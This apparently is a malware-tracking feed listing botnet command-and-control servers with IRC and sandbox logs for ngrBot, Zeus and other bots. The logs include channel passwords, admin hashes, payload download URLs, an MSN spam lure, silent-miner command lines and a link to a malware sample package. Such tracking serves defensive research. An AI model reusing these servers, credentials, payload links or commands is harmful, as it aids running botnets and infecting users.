3 websites use this address (examples: btcminers.biz, labekaa.com, xety.fr).
Remote Host Port Number
92.243.4.133 5900
PASS Virus
channel #3new#
NICK VirUs-ymurahxw
USER VirUs "" "gyf" : 8Coded 8VirUs..
NICK VirUs-urxuktmo
USER VirUs "" "gux" :
hosting infos: http://whois.domaintools.com/92.243.4.133
46.20.40.193 (ngrBot hosted in Germany Myloc Managed It Ag)
Remote Host Port Number
213.251.170.52 80
46.20.40.193 1337
PASS ngrBot
NICK n{US|XPa}lqosuhk
USER lqosuhk 0 0 :lqosuhk
JOIN #ngr ngrBot
PONG :Astros.GoV
Now talking in #ngr
Topic On : [ #ngr ] [ !mod pdef on ]
Topic By : [ Astros ]
hosting infos: http://whois.domaintools.com/46.20.40.193
40 MB malware samples
Here again with another package for malware lovers; most of them are banking trojans, password stealers and IRC bots.
Download: http://adf.ly/2CVhM
b.mobinil.biz (Silent BitCoin GPU Miner using Phoenix Miner)
http://b.mobinil.biz:8332/
cgminer.exe -o http://b.mobinil.biz:8332/ -u redem_g -p redemxxxxxxx -I 6
mamita.exe -a 59 -g yes -o http://b.mobinil.biz:8332/ -u redem_guild -p redem -t 2
mamita.exe -a 59 -g yes -o http://b.mobinil.biz:8332/ -u redem_guild -p redem -t 2
Resolved : [ b.mobinil.biz ] To [ 46.4.123.12 ]
Resolved : [ b.mobinil.biz ] To [ 108.60.208.157 ]
Resolved ...
115.239.230.68 (ngrBot hosted in China Zhejiang Ninbo Lanzhong Network Ltd)
Remote Host Port Number 115.239.230.68 5101 PASS hax0r 203.17.62.187 80 213.251.170.52 80 31.184.237.82 80 64.111.199.221 80 66.45.56.124 80 67.225.165.214 80 70.38.98.236 80 70.38.98.239 80
PASS hax0r..KCIK n{US|XPa}ncfvgh k..RSSR ncfvghk 0 0 :ncfvghk..SE ND #ngme ng00..
PRIVMSG #ngme :[d="http://31.184.237.82/ms02.exe" s="100352 bytes"] Executed file "C:Documents and SettingsUserNameApplication Data2.tmp" – Download retries: 0
PRIVMSG #ngme :[d="http://31.184.237.82/ppbnt.exe" s="61440 bytes"] ...
77.235.47.132 (ngrBot hosted in Netherlands Amsterdam Eurovps)
Remote Host Port Number
195.122.131.12 80
213.251.170.52 80
77.235.47.132 4042
PASS ngrBot
PRIVMSG #boss :[d="http://rapidshare.com/files/4007909942/shedontlikemeshelikemycar.exe"] Error downloading file [e="12039"]
NICK n{US|XPa}psbuhdn
USER psbuhdn 0 0 :psbuhdn
JOIN #boss ngrBot
PRIVMSG #boss :[MSN]: Updated MSN spread interval to "3"
PRIVMSG #boss :[MSN]: Updated MSN spread message to "haha! http://goo.gl/LVZjX?img=facebook_photoalbum_24_07_2011_jpeg"
The data identified by the following URLs ...
irc.swag.net (around 1.5k bots hosted in Germany Netdirect)
server: 178.162.234.177:6667
channel: #nix
hackers inside the botnet:
var $admins = array ( 'LiGHTzz' => 'e48e13207341b6bffb7fb1622282247b', 'cmd' => 'e48e13207341b6bffb7fb1622282247b', 'broken' => 'e48e13207341b6bffb7fb1622282247b',
Operators : 10 operator(s) online
Channels : 14 channels formed
Clients : I have 131 clients and 1 servers
Local users : Current Local Users: 131 Max: 1574
Global users : Current Global ...
50.31.0.109 (1k Linux bots hosted in United States Chicago Steadfast Networks)
var $config = array("server"=>"50.31.0.109", "port"=>"8080", "pass"=>"", "prefix"=>"tibia|", "maxrand"=>"4", "chan"=>"#tibia2", "chan2"=>"#tibia", "key"=>"puto", "modes"=>"+p", "password"=>"lol321", "trigger"=>".", "hostauth"=>"*" //
Invisible Users : 2
Channels : 1 channels formed
Clients : I have 148 clients and 0 servers
Local users : Current local users: 148 Max: 1000
Global users : Current global users: 148 Max: 1000
hosting infos: http://whois.domaintools.com/50.31.0.109
ks3096360.kimsufi.com (Zeus banking trojans hosted in France Ovh Systems)
ks3096360.kimsufi.com DNS_TYPE_A 94.23.232.121
Port Type
24477 tcp
HTTP Conversations:
94.23.232.121:80 – [ks3096360.kimsufi.com]
Request: GET /Zeus/config.bin Response: 200 "OK"
74.125.224.146:80 – [www.google.com]
Request: GET /webhp Response: 200 "OK"
94.23.232.121:80 – [ks3096360.kimsufi.com]
Request: POST /Zeus/gate.php Response: 200 "OK"
Request: POST /Zeus/gate.php Response: 200 "OK"
EXE FILE: http://ks3096360.kimsufi.com/Zeus/bot.exe
hosting infos: http://whois.domaintools.com/94.23.232.121
78.188.249.114 (IRC botnet hosted in Turkey Istanbul Turk Telekomunikasyon Anonim Sirketi)
Remote Host Port Number
78.188.249.114 7777
MODE {KnoX|USA|564335} -ix
JOIN ##imbot## KCA
PRIVMSG ##imbot## : Exe Rarl Dosyalara Ekleniyor.
PONG HTTP1.4
NICK {KnoX|USA|564335}
USER COMPUTERNAME * 0 :COMPUTERNAME
Now talking in ##imbot##
Topic 11 On 12: [ ##imbot## ] [ .rar ]
Topic 11 By 12: [ KnX ]
hosting infos: http://whois.domaintools.com/78.188.249.114